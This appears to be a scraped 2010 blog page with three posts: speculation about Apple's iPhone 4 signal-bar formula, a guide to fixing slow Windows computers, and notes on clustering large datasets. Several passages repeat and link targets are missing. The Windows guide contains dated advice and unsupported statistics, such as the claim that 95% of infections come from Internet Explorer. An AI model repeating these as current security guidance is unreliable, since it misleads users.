Apple released the today that they were "stunned to find" (could they be any more dramatic?) that the formula used to map signal strength to bars on the iPhone 4 is "totally wrong". They state they will fix the problem by reducing the number of bars displayed for a given signal strength.
"Our formula, in many instances, mistakenly displays 2 more bars than it should for a given signal strength. For example, we sometimes display 4 bars when we should be displaying as few as 2 bars. Users observing a drop of several bars when they grip their iPhone in a certain way are most likely in an area with very weak signal strength, but they don’t know it because we are erroneously displaying 4 or 5 bars. Their big drop in bars is because their high bars (sic) were never real in the first place (sic again)."
HOWEVER I claim that they will increase the number of bars for weak signals, and only decrease the number of bars for medium-strength signals. Here's the reasoning:
The great irony of all this is that it appears Apple has been caught red-handed trying to inflate their signal strength in the first place...
"Our formula, in many instances, mistakenly displays 2 more bars than it should for a given signal strength. For example, we sometimes display 4 bars when we should be displaying as few as 2 bars. Users observing a drop of several bars when they grip their iPhone in a certain way are most likely in an area with very weak signal strength, but they don’t know it because we are erroneously displaying 4 or 5 bars. Their big drop in bars is because their high bars (sic) were never real in the first place (sic again)."
HOWEVER I claim that they will increase the number of bars for weak signals, and only decrease the number of bars for medium-strength signals. Here's the reasoning:
- The open letter implies several times that when the number of bars is low, the reading doesn't reflect the actual operability of the phone, i.e. that the low end of the bar scale is too low: "iPhone 4 can drop 4 or 5 bars when tightly held...This is a far bigger drop than normal, and as a result some have accused the iPhone 4 of having a faulty antenna design. At the same time, we continue to read articles and receive hundreds of emails from users saying that iPhone 4 reception is better than the iPhone 3GS. They are delighted. This matches our own experience and testing...The iPhone 4's performance is the best we've ever shipped".
- They say "To fix this, we are adopting AT&T’s recently recommended formula for calculating how many bars to display for a given signal strength", but it's impossible to believe that they'll just apply AT&T's formula without tweaking it if you also believe their claims that the iPhone 4 really is better at operating on a weak signal than previous phones -- because bars are a subjective measure of the cellphone's ability to connect over the cell network. These two claims simply don't match up. They'll jack up the number of bars compared to the AT&T recommendation if it really is true the iPhone 4 can get the same quality of connection on a weaker signal than previous iPhones.
- There would be a public outcry if they just drop the signal threshold for each of the bars (a drop of 4->2 could now be 2->1 or 2->0 if they are just displaying "two more bars than we should"), or even if they just dropped the signal strength threshold of the high-numbered bars -- "I got the iOS update and now my phone has a weaker signal than ever!". The whole problem is that people believe bars and don't understand the science or math behind the bars.
- Apple's magic fix for previous iPhone signal strength problems was supposedly an inflation of the number of displayed bars. (It keeps people happier.)
The great irony of all this is that it appears Apple has been caught red-handed trying to inflate their signal strength in the first place...
2010-06-26
Is your computer slow? Fix your own computer.
I have fixed about six computers in the last two weeks, and just like 95% of the other computer help I give people these days, it came down to this one problem:
One thing I have noticed is that most people just live with slow computers because they don't know where to turn for help, or they don't know that things could be better. I figured it was time to write this blog post -- slow computers are fixable, and in fact you can fix it yourself. The following steps should fix 95% of your computer slowness issues, and your computer will probably feel 2x-5x faster when you are done. Please spread the word, you don't need to suffer in silence anymore :-)
(Note that this blog post applies to the Windows operating system, but you should be aware that there are other alternatives that don't get slower the longer you use them, including Mac OS, Linux and soon Google Chrome OS.)
HOW TO FIX YOUR OWN SLOW WINDOWS COMPUTER, AND ELIMINATE VIRUSES:
Step 1: Fix DNS settings (if necessary)
Some viruses redirect Web traffic to malicious sites, so you can't actually download or update antivirus software, etc. to fix your computer. If antivirus sites are inaccessible, and/or you get suspicious popups or fake sites when trying to visit well-known domains, follow the advice and/or .
Step 2: Disable unnecessary startup processes
Explanation: One of the biggest reasons your computer is slow is probably that when you switch your computer on, it loads all sorts of programs into RAM (memory) that are not needed. (A lot of these programs put icons down in the System Tray at the bottom left of the screen, but not all of them do.) When you run out of RAM, your computer uses the hard drive as extra storage (it "swaps out to disk"), and the hard drive is on the order of 1000 times slower than RAM. So the first thing you should do is stop all the unnecessary programs from starting when you boot, and you'll be less likely to run out of RAM.
How to do it: Download, install and run a .You will then be presented with a list of programs that are run when your computer starts up. In most cases, you won't break anything really badly if you uncheck all of them -- but try to understand what they each are before you uncheck. If you don't know, you can always uncheck it and come back and re-check it again if you notice something doesn't work right. A few cases to get you started:
Now reboot your computer and hopefully your computer will feel faster already.
Step 3: Get all Microsoft updates
Explanation: Microsoft pushes out critical and non-critical updates that fix bugs on your computer, speed your computer up, and make your computer less vulnerable to viruses and spyware. (Viruses and spyware are another big reason why computers can slow down.) In particular you need all Service Pack downloads, and you should update Internet Explorer to version 8, as this fixes some critical parts of Windows -- but you should get all the critical and recommended updates if you don't have them already.
How to do it: Open Internet Explorer and go to . You may be asked if you want to update from Windows Update to Microsoft Update. If you have the option, definitely install Microsoft Update, it is better than the older Windows Update because it keeps not just Windows but also Office up to date. Next follow directions to check for the latest software updates, and download and install all critical and recommended updates. You can also manually select a few optional updates here but you don't need them. You probably have to reboot after installing updates. Once you have rebooted, go back to and make sure there aren't new recommended updates listed that were there before. If there are new updates, then rinse and repeat. (Sometimes you can't install all updates at one time, some of them have to be performed in separate steps.)
Step 4: Replace your antivirus software with Microsoft Security Essentials
"Why is my computer so slow?"
"My computer seems to have a virus, how do I fix it?"
One thing I have noticed is that most people just live with slow computers because they don't know where to turn for help, or they don't know that things could be better. I figured it was time to write this blog post -- slow computers are fixable, and in fact you can fix it yourself. The following steps should fix 95% of your computer slowness issues, and your computer will probably feel 2x-5x faster when you are done. Please spread the word, you don't need to suffer in silence anymore :-)
(Note that this blog post applies to the Windows operating system, but you should be aware that there are other alternatives that don't get slower the longer you use them, including Mac OS, Linux and soon Google Chrome OS.)
HOW TO FIX YOUR OWN SLOW WINDOWS COMPUTER, AND ELIMINATE VIRUSES:
Step 1: Fix DNS settings (if necessary)
Some viruses redirect Web traffic to malicious sites, so you can't actually download or update antivirus software, etc. to fix your computer. If antivirus sites are inaccessible, and/or you get suspicious popups or fake sites when trying to visit well-known domains, follow the advice and/or .
Step 2: Disable unnecessary startup processes
Explanation: One of the biggest reasons your computer is slow is probably that when you switch your computer on, it loads all sorts of programs into RAM (memory) that are not needed. (A lot of these programs put icons down in the System Tray at the bottom left of the screen, but not all of them do.) When you run out of RAM, your computer uses the hard drive as extra storage (it "swaps out to disk"), and the hard drive is on the order of 1000 times slower than RAM. So the first thing you should do is stop all the unnecessary programs from starting when you boot, and you'll be less likely to run out of RAM.
How to do it: Download, install and run a .You will then be presented with a list of programs that are run when your computer starts up. In most cases, you won't break anything really badly if you uncheck all of them -- but try to understand what they each are before you uncheck. If you don't know, you can always uncheck it and come back and re-check it again if you notice something doesn't work right. A few cases to get you started:
- If you disable anything that says "Synaptics" or "SynTPE" then your touchpad might not have the full functionality, e.g. this program detects movement on the right hand side of the touchpad and causes the current window to scroll without you having to drag the scrollbar. You probably want to leave this checked. Also anything that talks about hotkeys handles the Fn+F4 key combinations etc., leave that checked if you need those functions.
- If you sync an iPod with your computer, you probably want to leave the iPod stuff checked.
- If you see something about HP printing and you have an HP printer, you can uncheck this and you will still be able to print, but you might not get notified on your computer when your ink is running low (not a big deal).
- If you uncheck something to do with your digital camera, then your photo editing software might not pop up when you plug in your camera, but you will get the standard Windows photo import window instead, and you can still start your photo editing software manually, so again it's not a big deal if you uncheck it.
- The programs you really want to kill is anything that says "QuickStart" or similar -- Acrobat reader, OpenOffice and other programs have quickstart options. They may be bringing your computer to its knees by filling up your memory.
- There are usually programs that start up that put advanced control panels for your graphics card and/or sound into the system tray. However you can usually disable these too and your sound and graphics will continue to work fine.
- In general, if you don't know what it is or why you need it, you probably won't miss it -- uncheck it! Some people would think this is extreme and generally bad advice -- but honestly, your computer won't be in worse shape than it was before when it was unusably slow :-) And again, you are not likely to break anything serious, but if something doesn't work properly after this step (e.g. your webcam doesn't work right), you can just try switching some of these programs back on again (by re-running CodeStuff Starter) and rebooting until you figure out what needed to be switched on.
Now reboot your computer and hopefully your computer will feel faster already.
Step 3: Get all Microsoft updates
Explanation: Microsoft pushes out critical and non-critical updates that fix bugs on your computer, speed your computer up, and make your computer less vulnerable to viruses and spyware. (Viruses and spyware are another big reason why computers can slow down.) In particular you need all Service Pack downloads, and you should update Internet Explorer to version 8, as this fixes some critical parts of Windows -- but you should get all the critical and recommended updates if you don't have them already.
How to do it: Open Internet Explorer and go to . You may be asked if you want to update from Windows Update to Microsoft Update. If you have the option, definitely install Microsoft Update, it is better than the older Windows Update because it keeps not just Windows but also Office up to date. Next follow directions to check for the latest software updates, and download and install all critical and recommended updates. You can also manually select a few optional updates here but you don't need them. You probably have to reboot after installing updates. Once you have rebooted, go back to and make sure there aren't new recommended updates listed that were there before. If there are new updates, then rinse and repeat. (Sometimes you can't install all updates at one time, some of them have to be performed in separate steps.)
Step 4: Replace your antivirus software with Microsoft Security Essentials
Explanation: Antivirus software has to wedge itself into all sorts of critical parts of your operating system to stop viruses in their tracks. As a result it can sometimes cause more problems than it prevents. Also you have to pay $60-100 per year for antivirus updates, otherwise your computer is still at risk from being infected by the newest viruses. Microsoft recently realized they need to start cleaning up the messes they created by selling an operating system full of security holes, and they released a product called Microsoft Security Essentials, which seems to be one of the few products they have gotten really right -- it's solid, fast, and best of all free forever: they will keep sending you updates for free and you never need to pay the Symantec / Norton / McAfee yearly tax again.
How to do it:
- Go to Start -> Settings -> Control Panel, and find the Control Panel program that lets you uninstall programs. You might have to click on "Classic View" on the left hand side of the Control Panel to find it easily. It might be called "Add/remove programs" or "Programs" or something else, they keep changing the name of it in different Windows versions, and I can never remember what it's called on each Windows version (I'm a Linux user) -- but when you find it it will have a list of all the programs you have installed. Uninstall anything that has "Symantec", "Norton", "McAfee", "ClamAV", "Kapersky" or similar in the name. Also uninstall anything that contains keywords like "Antivirus", "Spyware", "Spybot", "Internet security" etc. in the name. It's important to uninstall these before installing Microsoft Security Essentials, and don't worry, you'll only have it uninstalled briefly. You'll probably need to reboot after installing one or each of these.
- After rebooting, go to and download and install Microsoft Security Essentials. It's pretty easy to install, and when it is done it will ask if you want to download the latest virus definitions and run a scan -- choose Yes.
Step 5: Install the Google Chrome Web browser and never use Internet Explorer to browse the Web again
Explanation: Something most people don't know is that 95% of virus infections today come from using Internet Explorer. You should only ever use it for Microsoft Update and for nothing else. Something a lot of people also don't know is that they have a choice when it comes to web browsers. Internet Explorer is a terrible program, Firefox is better, safer and faster, and Google Chrome is like Fort Knox as far as security and it's faster than greased lightning. Using Google Chrome will therefore protect you online and it will make your computer feel even faster.
How to do it: Go to and download and install Google Chrome, and then go find any Internet Explorer icons on your desktop or in your Quick Launch tray (bottom left, by Start) and delete them so you don't accidentally use IE again. Use Chrome for all your browsing, I promise your computer will feel much, much faster.
THAT'S IT! Enjoy your new turbo-charged computer.
2010-06-20
Clustering large datasets
On the MIT-internal "csail-related" mailing list someone recently asked for software to help him perform matrix multiplications of 10^6 x 10^6-sized matrices. Ron Rivest quite correctly replied that to multiply matrices this size, even for a single multiplication you would probably need about 4 years of compute time -- because there are a trillion entries in matrices this size. I posted the following reply, which I am re-posting here partly for my own reference because it contains a lot of the points I have learned in various work clustering huge datasets, and partly in the hope that somebody else will find it useful.
--
Ron's analysis is correct, unless your matrix is very sparse -- in which case sparse matrix methods may make this problem entirely tractable, and any of the linear algebra toolkits implement efficient sparse matrix methods that you can use. The main problem you'll have is fitting it all in memory -- you'll need to look into matrix blocking techniques (dividing the big matrix into submatrices, and figuring out the correct way to multiply the subblocks to get the full result). There's some great discussion about keeping subblocks in CPU cache in the following paper that may help you figure out how to keep your much larger subblocks in main memory as long as possible: The difference between swapping subblocks in and out at the right time vs. the wrong time could make several orders of magnitude in difference in how long it takes to compute your result. There are also some parallel solutions to multiplying large matrices that will run on large clusters and trade off time swapping subblocks in and out of memory for data communication overhead between nodes.
A similar problem to matrix multiplication problem you describe is encountered in data clustering, given the "N Choose 2" or O(N^2) scaling of the number of pairwise distances in a dataset. It is intractable to use all-pairs distances with even the simplest clustering algorithms in large datasets, for example hierarchical agglomerative / bottom-up clustering applied to more than tens of thousands of points. Depending on the exact nature of the problem, you may be able to exploit spatial coherence within your problem space -- e.g. for agglomerative clustering, you use only the nearest neighbors when joining clusters, so you can often reduce the complexity of clustering problems using a smart data structure like a kd-tree that gives approximately O(log(N)) time per nearest neighbor lookup. However the kd-tree algorithm quickly degrades to ~O(N) performance per lookup in high-dimensional spaces because of the curse of dimensionality, so you may need to do dimensionality reduction first anyway to make the kd-tree useful. (You'd also have to reframe your matrix multiplication problem into a format where using a kd-tree to find nearest neighbors in your vectorspace helps you compute a fast, close approximation to your desired solution.)
Another approach used to cluster datasets with millions of points (and therefore trillions of pairs of points) is to pick a few exemplar points and cluster these instead to generate a sample approximation of cluster assignments for the full dataset. For example you could randomly choose one point out of every thousand, and cluster these into your K target clusters (= O(N^2 / 1000^2) time to cluster 1/1000th of the points), then go back through your full dataset and find the closest exemplar point to each original data point in order to compute the cluster labeling (= O(N^2/1000), although you can often skip this step entirely if you just use the exemplars). The largish constants in the time complexity can make this approach tractable for larger datasets than you could otherwise work with. The exemplar method I just described is incidentally half an iteration of the k-means/k-medians algorithm applied to a set of exemplar points. You can go further by completing the full first iteration of k-medians by going back and updating your selection of exemplar points using the medians of the newly-labeled clusters, and then depending on how much compute time you can afford, you could run multiple whole iterations of this exemplar-modified k-medians algorithm (or run until convergence) to get better exemplars -- though even the first half-iteration may be sufficient to get you a useful result. As far as how to phrase your matrix multiplication problem in this framework, depending on the problem you may be able to find representative row/column vectors this way and then just multiply the representative vectors together to get a product that in some sense is a low-dimensional approximation of the full matrix product.
Ultimately whether you use (PCA-based) dimensionality reduction or k-means / k-medians, you're doing approximately the same thing, and this is why preprocessing with PCA can often help k-means to converge faster : quoting from :
--
Ron's analysis is correct, unless your matrix is very sparse -- in which case sparse matrix methods may make this problem entirely tractable, and any of the linear algebra toolkits implement efficient sparse matrix methods that you can use. The main problem you'll have is fitting it all in memory -- you'll need to look into matrix blocking techniques (dividing the big matrix into submatrices, and figuring out the correct way to multiply the subblocks to get the full result). There's some great discussion about keeping subblocks in CPU cache in the following paper that may help you figure out how to keep your much larger subblocks in main memory as long as possible: The difference between swapping subblocks in and out at the right time vs. the wrong time could make several orders of magnitude in difference in how long it takes to compute your result. There are also some parallel solutions to multiplying large matrices that will run on large clusters and trade off time swapping subblocks in and out of memory for data communication overhead between nodes.
A similar problem to matrix multiplication problem you describe is encountered in data clustering, given the "N Choose 2" or O(N^2) scaling of the number of pairwise distances in a dataset. It is intractable to use all-pairs distances with even the simplest clustering algorithms in large datasets, for example hierarchical agglomerative / bottom-up clustering applied to more than tens of thousands of points. Depending on the exact nature of the problem, you may be able to exploit spatial coherence within your problem space -- e.g. for agglomerative clustering, you use only the nearest neighbors when joining clusters, so you can often reduce the complexity of clustering problems using a smart data structure like a kd-tree that gives approximately O(log(N)) time per nearest neighbor lookup. However the kd-tree algorithm quickly degrades to ~O(N) performance per lookup in high-dimensional spaces because of the curse of dimensionality, so you may need to do dimensionality reduction first anyway to make the kd-tree useful. (You'd also have to reframe your matrix multiplication problem into a format where using a kd-tree to find nearest neighbors in your vectorspace helps you compute a fast, close approximation to your desired solution.)
Another approach used to cluster datasets with millions of points (and therefore trillions of pairs of points) is to pick a few exemplar points and cluster these instead to generate a sample approximation of cluster assignments for the full dataset. For example you could randomly choose one point out of every thousand, and cluster these into your K target clusters (= O(N^2 / 1000^2) time to cluster 1/1000th of the points), then go back through your full dataset and find the closest exemplar point to each original data point in order to compute the cluster labeling (= O(N^2/1000), although you can often skip this step entirely if you just use the exemplars). The largish constants in the time complexity can make this approach tractable for larger datasets than you could otherwise work with. The exemplar method I just described is incidentally half an iteration of the k-means/k-medians algorithm applied to a set of exemplar points. You can go further by completing the full first iteration of k-medians by going back and updating your selection of exemplar points using the medians of the newly-labeled clusters, and then depending on how much compute time you can afford, you could run multiple whole iterations of this exemplar-modified k-medians algorithm (or run until convergence) to get better exemplars -- though even the first half-iteration may be sufficient to get you a useful result. As far as how to phrase your matrix multiplication problem in this framework, depending on the problem you may be able to find representative row/column vectors this way and then just multiply the representative vectors together to get a product that in some sense is a low-dimensional approximation of the full matrix product.
Ultimately whether you use (PCA-based) dimensionality reduction or k-means / k-medians, you're doing approximately the same thing, and this is why preprocessing with PCA can often help k-means to converge faster : quoting from :
It has been shown recently (2007) that the relaxed solution of , specified by the cluster indicators, is given by the PCA principal components, and the PCA subspace spanned by the principal directions is identical to the cluster centroid subspace specified by the between-class . Thus PCA automatically projects to the subspace where the global solution of K-means clustering lie, and thus facilitate K-means clustering to find near-optimal solutions.
Subscribe to:
Posts (Atom)